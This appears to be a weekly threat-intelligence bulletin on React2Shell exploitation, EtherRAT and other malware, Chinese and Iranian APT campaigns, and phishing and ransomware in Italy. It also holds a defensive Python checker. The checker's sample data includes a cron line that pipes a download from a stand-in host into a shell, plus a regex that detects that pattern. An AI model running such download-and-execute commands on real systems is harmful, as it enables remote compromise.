Updates on React2Shell exploitation, the latest from Beijing and Tehran, new attacks in Italy
React2Shell: EtherRAT and other malware delivered in state-sponsored and cybercrime activity
During a recent attack based on the exploitation of the critical vulnerability CVE-2025-55182 (known as React2Shell), security researchers identified a novel implant dubbed EtherRAT with sophisticated capabilities, including C2 communication via Ethereum smart contracts, five independent Linux persistence mechanisms, and the download of its own Node.js runtime from nodejs[.]org. The malware was retrieved on 5 December 2025 from a compromised Next.js application, just two days after the public disclosure of React2Shell, a Deserialization of Untrusted Data vulnerability in Meta’s React Server Components (RSC) that enables unauthenticated remote code execution through a single HTTP request, impacting the React 19 ecosystem and the frameworks that implement it, such as Next.js 15.x and 16.x. Additional analysts documented broader exploitation, identifying four distinct malware families. In addition to the gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh script used to deliver EtherRAT, three other scripts were recovered: tsd.sh, which establishes persistence via /etc/cron.hourly/ with an rc.local fallback; init.sh, which downloads a payload from an AWS S3 bucket, installs it in /usr/infju/system_os, and establishes persistence through systemd and a cron job that forces a daily reboot; and b.sh, which acts as a loader using gzip compression and Base64 encoding. While the first group of researchers attributes EtherRAT with high confidence to North Korean attackers, based on significant overlaps with the Contagious Interview campaign and on Node.js runtimes characteristic of the BeaverTail malware (both associated with the Lazarus Group), the second group assesses that the available data are insufficient for a definitive attribution.
Early exploitation activity revealed infrastructure attributable to the Beijing-linked APTs Earth Lamia and Jackpot Panda, while other researchers documented deployments of Cobalt Strike, Mirai, Noodle RAT (a backdoor likely used by Chinese-speaking groups involved in both espionage and cybercrime activities), BPFDoor (attributed to Red Menshen), Auto-Color, as well as SNOWLIGHT and VShell consistent with the activities of UNC5174 (CL-STA-1015), an Initial Access Broker presumably linked to the Ministry of State Security (MSS). Moreover, in the hours immediately following the public disclosure of React2Shell, opportunistic and large-scale exploitation operations were observed against exposed Next.js applications, characterized by the delivery of automated payloads aimed at distributing multi-stage loaders. Analysis of the latter highlights a rapid diversification of payloads and the absence of selective targeting, indicative of an initial phase of mass exploitation conducted by distinct attackers. In conclusion, the landscape reflects multi-adversary activity in which North Korean groups, Chinese actors, and cybercrime attackers rapidly weaponized CVE-2025-55182 for different objectives.
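The persistence artefacts described above (cron.hourly jobs, an rc.local fallback, a systemd unit for /usr/infju/system_os, a cron-driven daily reboot, and a gzip-plus-Base64 loader stage) can be triaged from a file snapshot. The following checker is an added example, not Telsy's code or any of the recovered scripts; the sample file contents are constructed, only the /usr/infju/system_os install path is taken from the report, and the download-piped-to-shell heuristic is an assumption of this example.

```python
import base64
import gzip
import re

# Locations named in the write-up for the React2Shell persistence scripts.
CRON_HOURLY = "/etc/cron.hourly/"
RC_LOCAL = "/etc/rc.local"
SYSTEMD_DIR = "/etc/systemd/system/"
INSTALL_PATH = "/usr/infju/system_os"  # install path reported for init.sh

# Heuristics (assumptions of this example, not indicators from the report).
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
FORCED_REBOOT = re.compile(r"\breboot\b|shutdown -r")


def scan_persistence(files):
    """files maps path -> text content (a collected snapshot).
    Returns (path, reason) tuples for entries worth an analyst's attention."""
    findings = []
    for path, content in files.items():
        if path.startswith(CRON_HOURLY) and DOWNLOAD_TO_SHELL.search(content):
            findings.append((path, "cron.hourly job pipes a download into a shell"))
        if path == RC_LOCAL and INSTALL_PATH in content:
            findings.append((path, "rc.local fallback launches reported install path"))
        if path.startswith(SYSTEMD_DIR) and INSTALL_PATH in content:
            findings.append((path, "systemd unit runs reported install path"))
        if path.startswith("/etc/cron") and FORCED_REBOOT.search(content):
            findings.append((path, "cron schedules a forced reboot"))
    return findings


def decode_loader_stage(blob):
    """Unpack a b.sh-style stage: Base64 text wrapping a gzip stream.
    Returns the decoded script text for offline inspection (never executed)."""
    return gzip.decompress(base64.b64decode(blob)).decode()


# Constructed snapshot: one benign cron job plus entries shaped like the report.
SAMPLE_FILES = {
    "/etc/cron.hourly/tsd": "#!/bin/sh\ncurl -s http://example.invalid/x | sh\n",
    "/etc/cron.hourly/logrotate": "#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/rc.local": "#!/bin/sh\n/usr/infju/system_os &\nexit 0\n",
    "/etc/systemd/system/system_os.service": "[Service]\nExecStart=/usr/infju/system_os\n",
    "/etc/cron.d/reboot": "0 3 * * * root /sbin/reboot\n",
}
# Constructed loader stage built the same way b.sh is described as packing it.
SAMPLE_STAGE = base64.b64encode(gzip.compress(b"echo constructed-second-stage")).decode()

if __name__ == "__main__":
    for path, reason in scan_persistence(SAMPLE_FILES):
        print(f"{path}: {reason}")
    print(decode_loader_stage(SAMPLE_STAGE))
```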
State-sponsored: new activity associated with Beijing and Tehran
CISA, the NSA, and the Canadian Centre for Cyber Security assess that Beijing-backed adversaries are using the BRICKSTORM malware, previously attributed to UNC5221, to maintain persistence on victims’ VMware vSphere servers. Targeted organizations operate primarily in the government services and facilities sector and in information technology. The ValleyRAT backdoor, previously associated with Chinese adversaries such as Void Arachne, has undergone in-depth analysis revealing its transformation from an APT tool into a publicly accessible malware framework. Analysts located the builder, leaked several months ago, and the threat’s development structure. The wide availability of both suggests increasingly broad and diversified use of the malware in the near future, beyond Beijing-backed APTs. Shifting to Iran, MuddyWater conducted espionage campaigns against targets in Turkey, Israel, and Azerbaijan leveraging the novel UDPGangster backdoor. One of the phishing emails identified masquerades as originating from the Ministry of Foreign Affairs of the Turkish Republic of Northern Cyprus and invites recipients to an online seminar titled “Presidential Elections and Results”. Attribution to the Tehran-linked APT is reinforced by the detection of an IP address shared by UDPGangster with the Phoenix backdoor, previously associated with this adversary.
Italy: cybercrime offensives target the country
Over the past week, several phishing campaigns targeting Italy were tracked. Among these is a thread hijacking operation aimed at organizations based in the national territory, intended to carry out Business Email Compromise (BEC) financial fraud. Another campaign exploits compromised email accounts of users belonging to the Public Administration (PA) to target other PA users: victims are redirected to a legitimate Figma page requesting login via email or Google authentication. Finally, another campaign involves sending an email with the subject “R: Urgent – List of scholarship recipients”, which redirects recipients to a fake portal of the Ministry of University and Research (MUR) with the aim of exfiltrating credentials of students and staff from several Italian universities. Turning to the ransomware landscape, the LockBit Team claimed on its leak site the attack against Milano Ristorazione S.p.A. on 24 November 2025, as well as the compromise of Iscot Italia S.p.A., specializing in technical cleaning, maintenance, and industrial logistics, and of the Municipality of Balmuccia (VC). The DATACARRY operator claimed a breach of the fashion company Camomilla Italia, while the Qilin Team claimed an attack on Capuano Distribuzione Fresco, an Italian logistics and transport company specializing in cold goods.
Weekly Threats is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.
The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.
Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.
